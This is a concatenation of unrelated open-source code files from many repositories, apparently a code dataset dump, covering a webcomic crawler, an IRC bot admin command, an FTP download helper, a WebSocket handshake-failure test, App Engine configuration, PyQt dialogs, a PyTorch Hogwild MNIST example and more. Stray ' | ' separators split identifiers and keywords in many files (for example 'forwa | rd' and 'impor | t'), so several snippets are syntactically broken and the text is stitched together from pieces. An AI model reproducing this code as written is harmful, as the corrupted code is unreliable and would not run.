                "available on your PYTHONPATH environment variable? Did you "
                "forget to activate a virtual environment?"
            )
        raise
    execute_from_command_line(sys.argv)
|
jodal/comics | comics/comics/tehgladiators.py | Python | agpl-3.0 | 765 | 0 | from comics.aggregator.crawler import CrawlerBase, CrawlerImage
from comics.core.comic_data import ComicDataBase
class ComicData(ComicDataBase):
    """Static metadata describing the Teh Gladiators comic."""
    name = "Teh Gladiators"
    language = "en"
    url = "http://www.tehgladiators.com/"
    start_date = "2008-03-18"
    rights = "Uros Jojic & Borislav Grabovic"
class Crawler(CrawlerBase):
    """Fetches Teh Gladiators strips from the site's RSS feed."""

    history_capable_days = 90
    schedule = "We"
    time_zone = "Europe/Belgrade"

    def crawl(self, pub_date):
        """Return the strip image for pub_date, or None when no feed entry
        exists for that date."""
        feed = self.parse_feed("http://www.tehgladiators.com/rss.xml")
        for entry in feed.for_date(pub_date):
            comic_page = self.parse_page(entry.link)
            image_url = comic_page.src('img[alt^="Teh Gladiators Webcomic"]')
            # first matching entry wins
            return CrawlerImage(image_url, entry.title)
|
JuezUN/INGInious | inginious/frontend/plugins/analytics/analytics_collection_manager.py | Python | agpl-3.0 | 2,152 | 0 | class AnalyticsCollectionManagerSingleton:
""" This Singleton class manages the DBs analytics collection. """
__instance = None
    @staticmethod
    def get_instance(db=None):
        """Static access method: return the shared singleton instance.

        ``db`` is only consulted on the first call, when the singleton is
        created; subsequent calls ignore it.
        """
        if not AnalyticsCollectionManagerSingleton.__instance:
            AnalyticsCollectionManagerSingleton(db)
        return AnalyticsCollectionManagerSingleton.__instance
    def __init__(self, database):
        """Virtually private constructor; use get_instance() instead."""
        if AnalyticsCollectionManagerSingleton.__instance:
            # direct construction after the singleton exists is an error
            raise Exception("This class is a singleton!")
        else:
            self.db = database
            AnalyticsCollectionManagerSingleton.__instance = self
    def add_visit(self, service, username, date, session_id, course_id):
        """Adds record of a visit to a service.

        ``service`` is a dict; only its "key" entry is stored.
        Returns the result of pymongo's ``insert``.
        """
        # NOTE(review): Collection.insert is deprecated in newer pymongo
        # (insert_one is the replacement) -- confirm the pinned version.
        return self.db.analytics.insert({'username': username,
                                         'service': service["key"],
                                         'date': date,
                                         'session_id': session_id,
                                         'course_id': course_id})
    def check_record(self, record_id):
        """Return the analytics record with the given ``_id``, or None."""
        return self.db.analytics.find_one({'_id': record_id})
    def check_user_records(self, username):
        """Return a cursor over all analytics records for ``username``."""
        return self.db.analytics.find({'username': username})
    def get_course_records(self, course_id):
        """Return a cursor over all analytics records for ``course_id``."""
        return self.db.analytics.find({'course_id': course_id})
    def _reset_records(self):
        """Drop the entire analytics collection (destructive; internal use)."""
        self.db.analytics.drop()
    def get_course_list(self):
        """Return the distinct course ids registered in analytics."""
        return self.db.analytics.distinct("course_id")
def filter_analytics_data(self, filters):
| """ get data from DB according the filters """
results | = self.db.analytics.aggregate([
{
"$match": filters
},
{
"$project": {
"username": 1,
"service": 1,
"date": 1,
"course_id": 1
}
}
])
return results
|
MatthewCox/PyMoronBot | pymoronbot/modules/admin/Admin.py | Python | mit | 5,227 | 0.001531 | # -*- coding: utf-8 -*-
"""
Created on Feb 09, 2018
@author: Tyranic-Moron
"""
from twisted.plugin import IPlugin
from pymoronbot.moduleinterface import IModule
from pymoronbot.modules.commandinterface import BotCommand, admin
from zope.interface import implementer
import re
from collections import OrderedDict
from pymoronbot.response import IRCResponse, ResponseType
@implementer(IPlugin, IModule)
class Admin(BotCommand):
def triggers(self):
return ['admin']
@admin("Only my admins may add new admins!")
def _add(self, message):
"""add <nick/full hostmask> - adds the specified user to the bot admins list.
You can list multiple users to add them all at once.
Nick alone will be converted to a glob hostmask, eg: *!user@host"""
if len(message.ParameterList) < 2:
return IRCResponse(ResponseType.Say,
u"You didn't give me a user to add!",
message.ReplyTo)
for admin in message.ParameterList[1:]:
if message.ReplyTo in self.bot.channels:
if admin in self.bot.channels[message.ReplyTo].Users:
user = self.bot.channels[message.ReplyTo].Users[admin]
admin = u'*!{}@{}'.format(user.User, user.Hostmask)
admins = self.bot.config.getWithDefault('admins', [])
admins.append(admin)
self.bot.config['admins'] = admins
self.bot.config.writeConfig()
return IRCResponse(ResponseType.Say,
u"Added specified users as bot admins!",
message.ReplyTo)
@admin("Only my admins may remove admins!")
def _del(self, message):
"""del <full hostmask> - removes the specified user from the bot admins list.
You can list multiple users to remove them all at once."""
if len(message.ParameterList) < 2:
return IRCResponse(ResponseType.Say,
u"You didn't give me a user to remove!",
message.ReplyTo)
deleted = []
skipped = []
admins = self.bot.config.getWithDefault('admins', [])
for admin in message.ParameterList[1:]:
if message.ReplyTo in self.bot.channels:
if admin in self.bot.channels[message.ReplyTo].Users:
user = self.bot.channels[message.ReplyTo].Users[admin]
admin = u'*!{}@{}'.format(user.User, user.Hostmask)
if admin not in admins:
skipped.append(admin)
continue
admins.remove(admin)
deleted.append(admin)
self.bot.config['admins'] = admins
self.bot.config.writeConfig()
return IRCResponse(ResponseType.Say,
u"Removed '{}' as admin(s), {} skipped"
.format(u', '.join(deleted), len(skipped)),
message.ReplyTo)
def _list(self, message):
"""list - lists all admins"""
owners = self.bot.config.getWithDefault('owners', [])
admins = self.bot.config.getWithDefault('admins', [])
return IRCResponse(ResponseType.Say,
u"Owners: {} | Admins: {}".format(u', '.join(owners),
u', '.join(admins)),
message.ReplyTo)
subCommands = OrderedDict([
(u'add', _add),
(u'del', _del),
(u'list', _list)])
def help(self, query):
"""
@type query: list[str]
@rtype str
"""
if len(query) > 1:
subCommand = query[1].lower()
if subCommand in self.subCommands:
return u'{1}admin {0}'.format(re.sub(r"\s+", u" ", self.subCommands[subCommand].__doc__),
self.bot.commandChar)
else:
return self._unrecognizedSubcommand(subCommand)
else:
return self._helpText()
def _helpText(self):
return u"{1}admin ({0}) - manages users with bot admin permissions. " \
u"Use '{1}help admi | n <subcommand> for subcommand help.".format(u'/'.join(self.subCommands.keys()),
self.bot.commandChar)
def _unrecognizedSubcommand(self, subCommand):
return u"unrecognized subcommand '{}', " \
u"available subcommands for admin are: {}".format(subCo | mmand, u', '.join(self.subCommands.keys()))
def execute(self, message):
if len(message.ParameterList) > 0:
subCommand = message.ParameterList[0].lower()
if subCommand not in self.subCommands:
return IRCResponse(ResponseType.Say,
self._unrecognizedSubcommand(subCommand),
message.ReplyTo)
return self.subCommands[subCommand](self, message)
else:
return IRCResponse(ResponseType.Say,
self._helpText(),
message.ReplyTo)
adminCommand = Admin()
|
Mafarricos/Mafarricos-modded-xbmc-addons | plugin.video.streamajoker/resources/site-packages/streamajoker/__init__.py | Python | gpl-2.0 | 92 | 0 | from streamajok | er.plugin import plugin
from streamajoker import common, cm | d, library, index
|
flynx/pli | pli/persistance/sql/shelve.py | Python | bsd-3-clause | 2,359 | 0.038576 | #=======================================================================
__version__ = '''0.0.01'''
__sub_version__ = '''20070108034250'''
__copyright__ = '''(c) Alex A. Naanou 2003'''
#-----------------------------------------------------------------------
import pli.pattern.mixin.mapping as mapping
#-----------------------------------------------------------SQLShelve---
##!!!
# XXX should this be live???
class SQLShelve(mapping.Mapping):
'''
'''
# TODO make this create a new dict for the id if one is not
# present.... (might be a good idea to use some other id
# method...)
# one alternative id method is to create a root dict that will
# contain names of all the dicts used and their coresponding
# id's...
def __init__(self, interface, name):
'''
'''
self._interface = interface
self._name = name
# if such a name does not exist...
try:
self._data = interface.get(name)
except KeyError:
d = self._data = {}
interface.write(name, d)
##!!! sanity check: if the name refereneces a non-dict or non-dict-like...
##!!!
def __getitem__(self, name):
'''
'''
if name in self._data:
return self._interface.get(self._data[name])
raise KeyError, name
##!!! make this safe...
def __setitem__(self, name, value):
'''
'''
interface = self._interface
data = self._data
try:
# insert the object...
oid = interface.write(value)
# update the keys dict...
data[name] = oid
interface.write(data)
except:
## ##!!! rollback...
## interface.__sql_reader__.sql.connection.rollback()
raise 'oops!'
# commit...
# XXX make this prittier!
interface.__sql_reader__.sql.connection.commit()
##!!! REWRITE: might be a tad cleaner...
def __delitem__(self, name):
'''
'''
## return self._interface.delete(self._data.pop(name))
interface = self._interface
data = self._data
try:
data.pop(name)
interface.write(data)
except:
## ##!!! rollback...
## interface.__sql_reader__.sql.connection.rollback()
raise 'oops!'
# commit...
# XXX make this prittier!
interface.__sql_reader__.sql.connection.commit()
def __iter__(self):
'''
'''
for name in self._data.keys():
yield name
#============================= | ==========================================
# vim:set ts=4 s | w=4 nowrap :
|
kaplun/harvesting-kit | harvestingkit/ftp_utils.py | Python | gpl-2.0 | 11,930 | 0.001676 | # -*- coding: utf-8 -*-
##
## This file is part of Harvesting Kit.
## Copyright (C) 2014 CERN.
##
## Harvesting Kit is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Harvesting Kit is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Harvesting Kit; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
from __future__ import print_function
import sys
import os
import time
from ftplib import FTP, error_perm
from os.path import join
from os import remove, getcwd
from urlparse import urlparse
from netrc import netrc
from datetime import datetime
class FtpHandler(object):
""" This class provides an interface to easily connect to an FTP server,
list its contents and download files/folders.
:param server: the URL to access the FTP server.
:type server: string
:param username: the user-name used to connect to the server.
:type username: string
:param passwd: the password used to connect to the server.
:type passwd: string
:param netrc_file: path to a netrc file that can be used
for authentication with the server.
:type netrc_file: string
"""
def __init__(self, server, username='', passwd='', netrc_file=''):
server = urlparse(server)
if server.netloc:
server = server.netloc
elif server.path:
server = server.path
self._ftp = FTP(server)
self._username = username
self._passwd = passwd
if netrc_file:
logininfo = netrc(netrc_file).authenticators(server)
self._username, _, self._passwd = logininfo
self.connect()
self._home = self._ftp.pwd()
def connect(self):
""" Connects and logins to the server. """
self._ftp.connect()
self._ftp.login(user=self._username, passwd=self._passwd)
def close(self):
""" Closes the connection to the server. """
self._ftp.close()
def download_folder(self, folder='', target_folder=''):
""" Downloads a whole folder from the server.
FtpHandler.download_folder() will download all the files
from the server in the working directory.
:param folder: the absolute path for the folder on the server.
:type folder: string
:param target_folder: absolute or relative path for the
destination folder default is the
working directory.
:type target_folder: string
"""
files, folders = self.ls(folder)
for fl in files:
self.download(join(folder, fl), target_folder)
for fld in folders:
self.download_folder(join(folder, fld), target_folder)
def download(self, source_file, target_folder=''):
""" Downloads a file from the FTP server to target folder
:param source_file: the absolute path for the file on the server
it can be the one of the files coming from
FtpHandler.dir().
:type source_file: string
:param target_folder: relative or absolute path of the
destination folder default is the
working directory.
:type target_folder: string
"""
current_folder = self._ftp.pwd()
if not target_folder.startswith('/'): # relative path
target_folder = join(getcwd(), target_folder)
folder = os.path.dirname(source_file)
self.cd(folder)
if folder.startswith("/"):
folder = folder[1:]
destination_folder = join(target_folder, folder)
if not os.path.exists(destination_folder):
print("Creating folder", destination_folder)
os.makedirs(destination_folder)
source_file = os.path.basename(source_file)
destination = join(destination_folder, source_file)
try:
with open(destination, 'wb') as result:
self._ftp.retrbinary('RETR %s' % (source_file,),
result.write)
except error_perm as e: # source_file is a folder
print(e)
remove(join(target_folder, source_file))
raise
self._ftp.cwd(current_folder)
def cd(self, folder):
""" Changes the working directory on the server.
:param folder: the desired directory.
:type folder: string
"""
if folder.startswith('/'):
self._ftp.cwd(folder)
else:
for subfolder in folder.split('/'):
if subfolder:
self._ftp.cwd(subfolder)
def ls(self, folder=''):
""" Lists the files and folders of a specific directory
default is the current working directory.
:param folder: the folder to be listed.
:type folder: string
:returns: a tuple with the list of files in the folder
and the list of subfolders in the folder.
"""
current_folder = self._ftp.pwd()
self.cd(folder)
contents = []
self._ftp.retrlines('LIST', lambda a: contents.append(a))
files = filter(lambda a: a.split()[0].startswith('-'), contents)
folders = filter(lambda a: a.split()[0].startswith('d'), contents)
files = map(lambda a: ' '.join(a.split()[8:]), files)
folders = map(lambda a: ' '.join(a.split()[8:]), folders)
self._ftp.cwd(current_folder)
return files, folders
def dir(self, folder='', prefix=''):
""" Lists all the files on the folder given as parameter.
FtpHandler.dir() lists all the files on the server.
:para folder: the folder to be listed.
:type folder: string
:param prefix: it does not belong to the interface,
it is used to recursively list the subfolders.
:returns: a list with all the files in the server.
"""
files, folders = self.ls(folder)
result = files
inner = []
for fld in folders:
try:
inner += self.dir(folder + '/' + fld, prefix + fld + '/')
except:
pass
result += inner
if prefix:
result = map(lambda a: prefix + a, result)
return result
def mkdir(self, folder):
""" Creates a folder in the server
:param folder: the folder to be created.
:type | folder: string
"""
current_folder = self._ftp.pwd()
#creates the necessary folders on
#the server if they don't exist
folders = folder.split('/')
for fld in folders:
try:
self.cd(fld)
except error_perm: # folder does not exist
self._ftp.mkd(fld)
self.cd(fld)
self.cd(current_folder)
def rm(self, filename):
""" Delete a file f | rom the server.
:param filename: the file to be deleted.
:type filename: string
"""
try:
self._ftp.delete(filename)
except error_perm: # target is either a directory
# either it does not exist
try:
current_folder = self._ftp.pwd()
self.cd(filename)
except error_perm:
print('550 Delete operation failed %s '
'does not exist!' % (filename,))
else:
self.cd(current_folder)
print('550 Delete operation failed %s '
'is a folder. Use rmdir function '
'to delete it.' % (filename,))
def rmdir(self, folde |
leighpauls/k2cro4 | content/test/data/layout_tests/LayoutTests/http/tests/websocket/tests/hybi/handshake-fail-by-more-protocol-header_wsh.py | Python | bsd-3-clause | 712 | 0.004213 | from mod_pywebsocket import handshake
from mod_pywebsocket.handshake.hybi import compute | _accept
def web_socket_do_extra_handshake(request):
msg = 'HTTP/1.1 101 Switching Protocols\r\n'
msg += 'Upgrade: websocket\r\n'
msg += 'Connection: Upgrade\r\n'
msg += 'Sec-WebSocket-Accept: %s\r\n' % compute_accept(request.headers_in['Sec-WebSocket-Key'])[0]
msg += 'Sec-WebSocket-Protocol: MatchProtocol\r\n'
msg += 'Sec-WebSocket-Protocol: MismatchProtocol\r\n'
msg += '\r\n'
request.connection.write(msg)
ra | ise handshake.AbortedByUserException('Abort the connection') # Prevents pywebsocket from sending its own handshake message.
def web_socket_transfer_data(request):
pass
|
pigeonflight/strider-plone | docker/appengine/google/appengine/tools/devappserver2/application_configuration.py | Python | mit | 19,480 | 0.009138 | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Stores application configuration taken from e.g. app.yaml, queues.yaml."""
# TODO: Support more than just app.yaml.
import errno
import logging |
import os
import os.path
import random
import string
import threading
import types
from google.appengine.api import appinfo
from google.appengine.api import appinfo_includes
from google | .appengine.api import backendinfo
from google.appengine.api import dispatchinfo
from google.appengine.tools.devappserver2 import errors
# Constants passed to functions registered with
# ModuleConfiguration.add_change_callback.
NORMALIZED_LIBRARIES_CHANGED = 1
SKIP_FILES_CHANGED = 2
HANDLERS_CHANGED = 3
INBOUND_SERVICES_CHANGED = 4
ENV_VARIABLES_CHANGED = 5
ERROR_HANDLERS_CHANGED = 6
NOBUILD_FILES_CHANGED = 7
class ModuleConfiguration(object):
"""Stores module configuration information.
Most configuration options are mutable and may change any time
check_for_updates is called. Client code must be able to cope with these
changes.
Other properties are immutable (see _IMMUTABLE_PROPERTIES) and are guaranteed
to be constant for the lifetime of the instance.
"""
_IMMUTABLE_PROPERTIES = [
('application', 'application'),
('version', 'major_version'),
('runtime', 'runtime'),
('threadsafe', 'threadsafe'),
('module', 'module_name'),
('basic_scaling', 'basic_scaling'),
('manual_scaling', 'manual_scaling'),
('automatic_scaling', 'automatic_scaling')]
def __init__(self, yaml_path):
"""Initializer for ModuleConfiguration.
Args:
yaml_path: A string containing the full path of the yaml file containing
the configuration for this module.
"""
self._yaml_path = yaml_path
self._app_info_external = None
self._application_root = os.path.realpath(os.path.dirname(yaml_path))
self._last_failure_message = None
self._app_info_external, files_to_check = self._parse_configuration(
self._yaml_path)
self._mtimes = self._get_mtimes([self._yaml_path] + files_to_check)
self._application = 'dev~%s' % self._app_info_external.application
self._api_version = self._app_info_external.api_version
self._module_name = self._app_info_external.module
self._version = self._app_info_external.version
self._threadsafe = self._app_info_external.threadsafe
self._basic_scaling = self._app_info_external.basic_scaling
self._manual_scaling = self._app_info_external.manual_scaling
self._automatic_scaling = self._app_info_external.automatic_scaling
self._runtime = self._app_info_external.runtime
if self._runtime == 'python':
logging.warning(
'The "python" runtime specified in "%s" is not supported - the '
'"python27" runtime will be used instead. A description of the '
'differences between the two can be found here:\n'
'https://developers.google.com/appengine/docs/python/python25/diff27',
self._yaml_path)
self._minor_version_id = ''.join(random.choice(string.digits) for _ in
range(18))
@property
def application_root(self):
"""The directory containing the application e.g. "/home/user/myapp"."""
return self._application_root
@property
def application(self):
return self._application
@property
def api_version(self):
return self._api_version
@property
def module_name(self):
return self._module_name or 'default'
@property
def major_version(self):
return self._version
@property
def version_id(self):
if self.module_name == 'default':
return '%s.%s' % (
self.major_version,
self._minor_version_id)
else:
return '%s:%s.%s' % (
self.module_name,
self.major_version,
self._minor_version_id)
@property
def runtime(self):
return self._runtime
@property
def threadsafe(self):
return self._threadsafe
@property
def basic_scaling(self):
return self._basic_scaling
@property
def manual_scaling(self):
return self._manual_scaling
@property
def automatic_scaling(self):
return self._automatic_scaling
@property
def normalized_libraries(self):
return self._app_info_external.GetNormalizedLibraries()
@property
def skip_files(self):
return self._app_info_external.skip_files
@property
def nobuild_files(self):
return self._app_info_external.nobuild_files
@property
def error_handlers(self):
return self._app_info_external.error_handlers
@property
def handlers(self):
return self._app_info_external.handlers
@property
def inbound_services(self):
return self._app_info_external.inbound_services
@property
def env_variables(self):
return self._app_info_external.env_variables
@property
def is_backend(self):
return False
def check_for_updates(self):
"""Return any configuration changes since the last check_for_updates call.
Returns:
A set containing the changes that occured. See the *_CHANGED module
constants.
"""
new_mtimes = self._get_mtimes(self._mtimes.keys())
if new_mtimes == self._mtimes:
return set()
try:
app_info_external, files_to_check = self._parse_configuration(
self._yaml_path)
except Exception, e:
failure_message = str(e)
if failure_message != self._last_failure_message:
logging.error('Configuration is not valid: %s', failure_message)
self._last_failure_message = failure_message
return set()
self._last_failure_message = None
self._mtimes = self._get_mtimes([self._yaml_path] + files_to_check)
for app_info_attribute, self_attribute in self._IMMUTABLE_PROPERTIES:
app_info_value = getattr(app_info_external, app_info_attribute)
self_value = getattr(self, self_attribute)
if (app_info_value == self_value or
app_info_value == getattr(self._app_info_external,
app_info_attribute)):
# Only generate a warning if the value is both different from the
# immutable value *and* different from the last loaded value.
continue
if isinstance(app_info_value, types.StringTypes):
logging.warning('Restart the development module to see updates to "%s" '
'["%s" => "%s"]',
app_info_attribute,
self_value,
app_info_value)
else:
logging.warning('Restart the development module to see updates to "%s"',
app_info_attribute)
changes = set()
if (app_info_external.GetNormalizedLibraries() !=
self.normalized_libraries):
changes.add(NORMALIZED_LIBRARIES_CHANGED)
if app_info_external.skip_files != self.skip_files:
changes.add(SKIP_FILES_CHANGED)
if app_info_external.nobuild_files != self.nobuild_files:
changes.add(NOBUILD_FILES_CHANGED)
if app_info_external.handlers != self.handlers:
changes.add(HANDLERS_CHANGED)
if app_info_external.inbound_services != self.inbound_services:
changes.add(INBOUND_SERVICES_CHANGED)
if app_info_external.env_variables != self.env_variables:
changes.add(ENV_VARIABLES_CHANGED)
if app_info_external.error_handlers != self.error_handlers:
changes.add(ERROR_HANDLERS_CHANGED)
self._app_info_external = app_info_external
if changes:
self._minor_version_id = ''.join(random.choice(string.digits) for _ in
range(18))
return changes
@ |
khalibartan/Antidote-DM | Antidotes DM/Downloader/Credits.py | Python | gpl-2.0 | 3,631 | 0.007436 | # -*- coding: cp1252 -*-
from PyQt4 import QtCore, QtGui
from PyQt4.QtCore import *
from PyQt4.QtGui import *
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_CreditsDialog(QtGui.QDialog):
def __init__(self, parent=None):
super(Ui_CreditsDialog, self).__init__(parent)
self.setupUi(self)
def setupUi(self, Dialog):
Dialog.setObjectName(_fromUtf8("Dialog"))
Dialog.resize(348, 128)
font = QtGui.QFont()
font.setBold(False)
font.setUnderline(False)
font.setWeight(50)
Dialog.setFont(font)
self.textBrowser = QtGui.QTextBrowser(Dialog)
self.textBrowser.setGeometry(QtCore.QRect(0, 0, 351, 131))
self.textBrowser.setObjectName(_fromUtf8("textBrowser"))
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
Dialog.setWindowTitle(_translate("Dialog", "Credits", None))
self.textBrowser.setHtml(_translate("Dialog", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'MS Shell Dlg 2\'; font-size:8.25pt; font-weight:400; font-style:normal;\">\n"
"<p align=\"center\" style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:8pt;\"><br | /></p>\n"
"<p align=\"center\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:10pt; font-weight:600; font-style:italic;\">Utkarsh Gupta</span></p>\n"
"<p align=\"center\" sty | le=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:8pt;\">Backend and extractor Development</span></p>\n"
"<p align=\"center\" style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:8pt;\"><br /></p>\n"
"<p align=\"center\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:10pt; font-weight:600; font-style:italic;\">Prabhat Doongarwal</span></p>\n"
"<p align=\"center\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:8pt;\">Frontend and UI Integration</span></p>\n"
"<p align=\"center\" style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:8pt;\"><br /></p>\n"
"<p align=\"center\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Arial,Verdana,sans-serif\'; font-size:8pt; color:#404040;\">© 2015 ANTIDOTE. All rights reserved</span><span style=\" font-size:8pt;\"> </span></p></body></html>", None))
|
danieljwest/mycli | tests/test_naive_completion.py | Python | bsd-3-clause | 1,653 | 0.00363 | from __future__ import unicode_literals
import pytest
from prompt_toolkit.completion import Completion
from prompt_toolkit.document impor | t Document
@pytest.fixture
def completer():
import mycli.sqlcompleter as sqlcompleter
return sqlcompleter.SQLCompleter(smart_completion=False)
@pytest.fixture
def complete_event():
from mock import Mock
return Mock()
def test_empty_string_completion(completer, complete_event):
text = ''
position = 0
result = set(completer.get_completions(
Document(text=text, cursor_position=positio | n),
complete_event))
assert result == set(map(Completion, completer.all_completions))
def test_select_keyword_completion(completer, complete_event):
text = 'SEL'
position = len('SEL')
result = set(completer.get_completions(
Document(text=text, cursor_position=position),
complete_event))
assert result == set([Completion(text='SELECT', start_position=-3)])
def test_function_name_completion(completer, complete_event):
text = 'SELECT MA'
position = len('SELECT MA')
result = set(completer.get_completions(
Document(text=text, cursor_position=position),
complete_event))
assert result == set([
Completion(text='MAX', start_position=-2),
Completion(text='MASTER', start_position=-2)])
def test_column_name_completion(completer, complete_event):
text = 'SELECT FROM users'
position = len('SELECT ')
result = set(completer.get_completions(
Document(text=text, cursor_position=position),
complete_event))
assert result == set(map(Completion, completer.all_completions))
|
bmccann/examples | mnist_hogwild/main.py | Python | bsd-3-clause | 2,352 | 0.001276 | from __future__ import print_function
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.multiprocessing as mp
from train import train
# Training settings
parser = argparse.ArgumentParser(description='PyTorch MNIST Example')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',
help='input batch size for testing (default: 1000)')
parser.add_argument('--epochs', type=int, default=10, metavar='N',
help='number of epochs to train (default: 2)')
parser.add_argument('--lr', type=float, default=0.01, metavar='LR',
help='learning rate (default: 0.01)')
parser.add_argument('--momentum', type=float, default=0.5, metavar='M',
help='SGD momentum (default: 0.5)')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=10, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--num-processes', type=int, default | =2, metavar='N',
help='how many training processes to use (default: 2)')
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(1, 10, kernel_size=5)
self.conv2 = nn.Conv2d(10, 20, kernel_size=5)
self.conv2_drop = nn.Dropout2d()
self.fc1 = nn.Linear(320, 50)
self.fc2 = nn.Linear(50, 10)
def forwa | rd(self, x):
x = F.relu(F.max_pool2d(self.conv1(x), 2))
x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))
x = x.view(-1, 320)
x = F.relu(self.fc1(x))
x = F.dropout(x, training=self.training)
x = F.relu(self.fc2(x))
return F.log_softmax(x)
if __name__ == '__main__':
args = parser.parse_args()
torch.manual_seed(args.seed)
model = Net()
model.share_memory()
processes = []
for rank in range(args.num_processes):
p = mp.Process(target=train, args=(rank, args, model))
p.start()
processes.append(p)
for p in processes:
p.join()
|
thegazelle-ad/gazelle-server | deployment-resources/http-error-static-pages/5xx-static-html-generator.py | Python | mit | 815 | 0.008589 | import os, errno
# Create build folder if it doesn't exist
def get_path(relative_path):
cur_dir = os.path.dirname(__file__)
return os.path.join(cur_dir, relative_path)
try:
os.makedirs(get_path('build'))
except OSError as e:
if e.errno != errno.EEXIST:
raise
template = open(get_path('./5xx.template.html'), 'r')
templateString = template.read()
template.close()
# We only use 0-11 according to
# https://en.wikipedia.org/wiki/List_of_HTTP_status_codes#5xx_Server_error |
for i in range(12):
numString = str(i) if i >= 10 else '0{}'.format(i)
fileName = './build/5{}.html'.format(numString)
outputFile = open(get_path(fileName), 'w')
htmlString = templateString.replace('{ERROR_CODE_PLACEHOLDER}', '5{}'.format(numString))
| outputFile.write(htmlString)
outputFile.close()
|
ProfessorX/Config | .PyCharm30/system/python_stubs/-1247971765/PyQt4/QtGui/QIntValidator.py | Python | gpl-2.0 | 1,504 | 0.009973 | # encoding: utf-8
# module PyQt4.QtGui
# from /usr/lib/python3/dist-packages/PyQt4/QtGui.cpython-34m-x86_64-linux-gnu.so
# by generator 1.135
# no doc
# imports
import PyQt4.QtCore as __PyQt4_QtCore
from .QValidator import QValidator
class QIntValidator(QValidator):
"""
QIntValidator(QObject parent=None)
QIntValidator(int, int, QObject parent=None)
"""
def bottom(self): # real signature unknown; restored from __doc__
""" QIntValidator.bottom() -> int """
return 0
def fixup(self, p_str): # real signature unknown; restored from __doc__
""" QIntValidator.fixup(str) -> str """
return ""
def setBottom(self, p_int): # real signature unknown; restored from __doc__
""" QIntValidator.setBottom(int) """
| pass
def setRange(self, p_int, p_int_1): # real | signature unknown; restored from __doc__
""" QIntValidator.setRange(int, int) """
pass
def setTop(self, p_int): # real signature unknown; restored from __doc__
""" QIntValidator.setTop(int) """
pass
def top(self): # real signature unknown; restored from __doc__
""" QIntValidator.top() -> int """
return 0
def validate(self, p_str, p_int): # real signature unknown; restored from __doc__
""" QIntValidator.validate(str, int) -> (QValidator.State, str, int) """
pass
def __init__(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads
pass
|
serge-sans-paille/pythran | pythran/analyses/optimizable_comprehension.py | Python | bsd-3-clause | 1,008 | 0 | """
OptimizableComp finds whether a comprehension can be optimized.
"""
from pythran.analyses.identifiers import Identifiers
from pythran.passmanager import NodeAnalysis
class OptimizableComprehension(NodeAnalysis):
"""Find whether a comprehension can be optimized."""
def __init__(self):
self.result = set()
super(OptimizableCompreh | ension, self).__init__(Identifiers)
def check_comprehension(self, iters):
targets = {gen.target.id for gen in iters}
o | ptimizable = True
for it in iters:
ids = self.gather(Identifiers, it)
optimizable &= all(((ident == it.target.id) |
(ident not in targets)) for ident in ids)
return optimizable
def visit_ListComp(self, node):
if (self.check_comprehension(node.generators)):
self.result.add(node)
def visit_GeneratorExp(self, node):
if (self.check_comprehension(node.generators)):
self.result.add(node)
|
TwilioDevEd/api-snippets | notifications/rest/credentials/update-credential/update-credential.7.x.py | Python | mit | 707 | 0 | # NOTE: This example uses the next generation Twilio helper library - for more
# informat | ion on how to download and install this version, visit
# https://www.twilio.com/docs/libraries/python
import os
from twilio.rest import Client
# Your Account Sid and Auth Token from twilio.com/user/account
